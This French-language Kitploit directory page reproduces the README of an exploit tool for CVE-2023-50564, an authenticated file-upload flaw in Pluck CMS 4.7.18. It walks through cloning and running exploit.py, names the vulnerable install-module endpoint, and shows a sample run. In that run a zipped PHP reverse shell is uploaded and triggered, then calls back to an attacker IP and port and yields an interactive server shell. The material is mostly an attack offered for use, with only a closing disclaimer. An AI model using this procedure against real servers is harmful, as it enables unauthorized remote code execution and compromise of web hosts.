Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-50564 — Ce script exploite la fonctionnalité de téléversement de fichiers de Pluck CMS v4.7.18 pour téléverser un fichier PHP malveillant, permettant un accès distant via un reverse shell. Une fois téléversé, ce backdoor octroie à l'attaquant un accès au serveur avec les permissions du serveur web, permettant d'autres actions au sein du système ou du réseau. | Kitploit
Outils/GitHubGitHub/mrterrestrial/cve-2023-50564
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubmrterrestrial/cve-2023-50564

CVE-2023-50564

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Ce script exploite la fonctionnalité de téléversement de fichiers de Pluck CMS v4.7.18 pour téléverser un fichier PHP malveillant, permettant un accès distant via un reverse shell. Une fois téléversé, ce backdoor octroie à l'attaquant un accès au serveur avec les permissions du serveur web, permettant d'autres actions au sein du système ou du réseau.

Voir le dépôt
1il y a 1 anPas encore vérifié
Partager

CVE-2023-50564 - Exploit Pluck CMS v4.7.18

Aperçu

Ce script exploite une vulnérabilité de téléchargement arbitraire de fichiers authentifié dans Pluck CMS v4.7.18 (CVE-2023-50564). En exploitant cette vulnérabilité, un attaquant authentifié peut télécharger un fichier PHP malveillant, permettant l'exécution de code arbitraire (dans ce cas, un reverse shell).

Détails de l'exploit

  • ID CVE : CVE-2023-50564
  • Version affectée : Pluck CMS v4.7.18
  • Type : Téléchargement arbitraire de fichiers authentifié
  • Impact : Exécution de code à distance (RCE)

La vulnérabilité existe dans le point de terminaison /admin.php?action=installmodule, qui permet à un utilisateur authentifié de télécharger un fichier ZIP contenant des fichiers arbitraires. En téléchargeant un fichier PHP malveillant, cet exploit établit un reverse shell vers l'attaquant.

Prérequis

  • Python 3.x
  • Module requests : pip install requests
  • Module requests-toolbelt : pip install requests-toolbelt

Ce script nécessite également un identifiant valide pour l'instance Pluck CMS, incluant l'URL de la cible et le mot de passe.

Fonctionnalités de l'exploit

  • Reverse Shell : L'exploit télécharge un reverse shell PHP vers la cible et se connecte à la machine de l'attaquant.
  • Exécution interactive de commandes : Une fois le reverse shell établi, les commandes peuvent être exécutées de manière interactive sur la cible.
  • Détection des invites de mot de passe : L'exploit détecte les invites de mot de passe (par exemple, su, sudo -l) et permet à l'utilisateur de fournir une entrée manuellement.

Utilisation

Étapes pour exécuter l'exploit

  1. Cloner le dépôt :
    root@kitploit:~
    git clone https://github.com/yourusername/Pluck-CMS-Exploit.git
    cd Pluck-CMS-Exploit
    
  2. Installer les paquets Python requis :
    root@kitploit:~
    pip install requests requests-toolbelt
    
  3. Exécuter l'exploit : Le script nécessite quatre entrées : l'URL cible, le mot de passe du CMS, votre adresse IP (pour le reverse shell) et le port sur lequel vous souhaitez écouter.

Exécutez l'exploit avec Python :

root@kitploit:~
 python3 exploit.py
  1. Fournir les entrées lorsque demandé :
  • Entrez l'URL cible (par exemple, example.com).
  • Entrez le mot de passe pour l'authentification sur le CMS.
  • Entrez votre adresse IP pour la connexion reverse shell.
  • Entrez le port pour écouter le reverse shell.
  1. Shell interactif : Une fois le reverse shell établi, vous serez présenté avec une invite Shell> pour interagir avec le système cible.

Exemple :

root@kitploit:~
 $ python3 exploit.py
 Enter the target URL (e.g., example.com): pluckcms.vulnerable.com
 Enter the password for target authentication: password123
 Enter your IP (for reverse shell): 10.10.14.5
 Enter the port to listen on (for reverse shell): 4444
 [*] Authenticating to the target...
 [+] Authentication successful.
 [*] Generating reverse shell PHP file...
 [+] Reverse shell PHP file created successfully as 'shell.php'.
 [*] Creating ZIP payload...
 [+] ZIP file created as 'payload.zip'.
 [*] Starting reverse shell listener on 10.10.14.5:4444 ...
 [*] Uploading payload to the target...
 [+] Payload uploaded successfully.
 [*] Triggering reverse shell at: http://pluckcms.vulnerable.com/data/modules/payload/shell.php
 [+] Connection received from ('10.10.10.1', 55678)
 Shell> whoami
 www-data

Décomposition de l'exploit

  • Authentification : Le script se connecte au CMS en utilisant les identifiants fournis.
  • Téléchargement de fichier : Il crée une archive ZIP contenant un reverse shell PHP et la télécharge sur le point de terminaison vulnérable (/admin.php?action=installmodule).
  • Reverse Shell : Le script déclenche le fichier PHP téléchargé, établissant une connexion reverse shell vers la machine de l'attaquant.

Détails CVE

  • ID CVE : CVE-2023-50564
  • Point de terminaison vulnérable : /admin.php?action=installmodule
  • Version vulnérable : Pluck CMS v4.7.18
  • Type : Téléchargement arbitraire de fichiers authentifié

Avertissement

Ce script est destiné à des fins éducatives et au piratage éthique. Il ne doit être utilisé que dans des environnements où vous avez l'autorisation explicite de tester. L'auteur n'est pas responsable de toute utilisation abusive de cet outil.

Licence

Ce projet est sous licence MIT - voir Licence MIT pour plus de détails.

Contribution

N'hésitez pas à forker le dépôt et à soumettre des pull requests. Pour tout problème ou demande de fonctionnalité, veuillez ouvrir une issue sur GitHub.

Télécharger l’outil